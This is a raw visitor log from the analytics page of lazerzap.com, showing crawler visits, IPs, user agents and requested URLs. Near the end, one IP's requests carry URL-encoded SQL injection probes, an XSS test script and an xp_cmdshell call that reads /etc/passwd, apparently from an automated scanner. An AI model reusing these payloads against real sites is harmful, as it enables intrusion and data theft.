lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) No Referrer Jul 12 - 09:46 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 09:53 United States 66.249.66.79 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 10:14 China 202.100.179.141 http://lazerzap.com//index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Unknown Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 No Referrer Jul 12 - 10:14 China 202.100.179.141 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Unknown Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 No Referrer Jul 12 - 10:14 China 202.100.179.141 http://lazerzap.com//index.php?s=/Core/File/uploadPictureBase64.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Unknown Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 No Referrer Jul 12 - 10:14 China 202.100.179.141 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 No Referrer Jul 12 - 10:20 Netherlands 46.229.161.131 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown SEMrushBot No Referrer Jul 12 - 11:32 United States 66.249.66.79 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 11:35 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 11:39 China 14.215.176.133 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=similard4x Jul 12 - 11:45 United States 66.249.66.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 11:53 United States 54.157.145.136 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) No Referrer Jul 12 - 11:57 China 123.125.143.193 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=understandingfpf Jul 12 - 12:15 United States 209.250.225.38 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11 No Referrer Jul 12 - 12:24 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 12 - 12:24 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 12 - 12:24 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 12 - 12:24 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 12 - 12:24 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 12 - 12:24 Russian Federation 46.161.9.3 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 12 - 12:27 United States 54.36.148.99 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 12 - 12:30 United States 66.249.66.80 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 12:38 Russian Federation 46.161.9.71 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 http://lazerzap.com/ Jul 12 - 12:40 United States 66.249.66.79 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 13:01 United States 54.36.149.0 http://lazerzap.com/index.php/wp-json/wp/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 12 - 13:03 United States 54.36.148.224 http://lazerzap.com/index.php/trackback/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 12 - 13:11 United States 18.130.167.11 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown AHC/2.1 No Referrer Jul 12 - 14:02 China 14.215.176.137 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=churchone Jul 12 - 14:16 United States 54.157.145.136 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) No Referrer Jul 12 - 14:21 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 14:36 United States 34.229.140.102 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) No Referrer Jul 12 - 14:38 China 42.236.102.3 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider http://lazerzap.com/ Jul 12 - 15:09 Russian Federation 77.88.5.27 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) No Referrer Jul 12 - 15:30 United States 54.36.149.32 http://lazerzap.com/index.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 12 - 15:34 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 15:43 United States 66.249.66.79 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 15:50 India 180.87.248.72 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown No Referrer Jul 12 - 16:12 Netherlands 46.229.168.78 http://lazerzap.com/index.php/component/users/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; SemrushBot/2~bl; +http://www.semrush.com/bot.html) No Referrer Jul 12 - 16:25 China 180.76.15.10 http://www.lazerzap.com/index.php/+/ts_files/ts_files/visitor_data.html www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 12 - 16:27 Germany 138.246.253.5 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Chrome Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36 No Referrer Jul 12 - 16:30 Netherlands 46.229.168.66 http://lazerzap.com/index.php/wp-json/wp/v2/posts/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; SemrushBot/2~bl; +http://www.semrush.com/bot.html) No Referrer Jul 12 - 16:38 United States 34.201.162.128 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) No Referrer Jul 12 - 16:39 China 180.76.15.10 http://www.lazerzap.com/index.php/component/users/ts_files/updatetopsites.php www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 12 - 16:52 United States 54.36.148.224 http://lazerzap.com/index.php/+/ts_files/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 12 - 17:26 United States 54.86.247.97 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) No Referrer Jul 12 - 17:39 United States 66.249.66.79 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 17:47 United States 54.36.148.231 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 12 - 17:50 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 18:07 China 14.215.176.144 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=practical6l5 Jul 12 - 18:30 Netherlands 46.229.161.131 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown SEMrushBot No Referrer Jul 12 - 18:31 United States 54.36.149.61 http://lazerzap.com/index.php/+/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 12 - 18:35 United States 34.201.162.128 http://lazerzap.com/?author=0 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) No Referrer Jul 12 - 18:40 United States 54.36.148.200 http://lazerzap.com/index.php/mber/randomimages.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 12 - 18:41 United States 66.249.66.78 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 18:46 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 19:16 United States 66.249.66.219 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 19:16 United States 66.249.66.219 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/42.0.2393.94 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup&GHBe%3D2026%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=8909 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%29%22%22%29%29%27%22%2C%27%2C www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%27gZWSMX%3C%27%22%3ETWCOMO www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%29%20AND%209420%3D4493%20AND%20%288923%3D8923 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%29%20AND%205865%3D5865%20AND%20%281238%3D1238 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%20AND%203139%3D8231 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%20AND%205865%3D5865 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%27%29%20AND%205323%3D5621%20AND%20%28%27LCFK%27%3D%27LCFK www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%27%29%20AND%205865%3D5865%20AND%20%28%27RBdb%27%3D%27RBdb www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%27%20AND%201071%3D8456%20AND%20%27skqg%27%3D%27skqg www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%27%20AND%205865%3D5865%20AND%20%27wgcr%27%3D%27wgcr www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%25%27%20AND%205963%3D8186%20AND%20%27%25%27%3D%27 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%25%27%20AND%205865%3D5865%20AND%20%27%25%27%3D%27 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%20AND%206295%3D2067--%20OpQA www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%20AND%205865%3D5865--%20ncjF www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=%28SELECT%20%28CASE%20WHEN%20%289966%3D6440%29%20THEN%209966%20ELSE%209966%2A%28SELECT%209966%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=%28SELECT%20%28CASE%20WHEN%20%284199%3D4199%29%20THEN%204199%20ELSE%204199%2A%28SELECT%204199%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%29%20AND%20%28SELECT%207738%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71766b7a71%2C%28SELECT%20%28ELT%287738%3D7738%2C1%29%29%29%2C0x71627a6a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%285617%3D5617 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%20AND%20%28SELECT%207738%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71766b7a71%2C%28SELECT%20%28ELT%287738%3D7738%2C1%29%29%29%2C0x71627a6a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Firefox Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 No Referrer Jul 12 - 19:33 185.92.73.108 http://www.lazerzap.com/index.php?p=member%2Fsignup%27%29%20AND%20%28SELECT%207738%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71766b7a71%2C%28SELECT%20%28ELT%287738%3D7738%2C1%29%29%29%2C0x71627a6a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27QYSf%27%3D%27QYSf www.lazerzap.com 173.249.55.220 [WHO